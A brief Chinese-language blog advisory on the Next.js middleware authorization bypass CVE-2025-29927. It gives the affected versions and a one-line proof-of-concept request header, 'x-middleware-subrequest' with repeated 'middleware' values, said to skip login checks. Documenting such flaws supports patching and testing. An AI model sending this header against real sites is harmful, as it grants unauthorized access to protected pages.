Next.js 中间件权限绕过漏洞(CVE-2025-29927)
漏洞介绍
1 | 该漏洞成因是框架中用于标记中间件递归请求的特殊请求头x-middleware-subrequest可被用户伪造, |
影响版本
1 | 11.1.4 < Next.js ≤ 13.5.6 |
验证 POC(添加特定请求头即可绕过验证进入登录后的界面)
1 | x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware |

本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Bbdolt's Blog!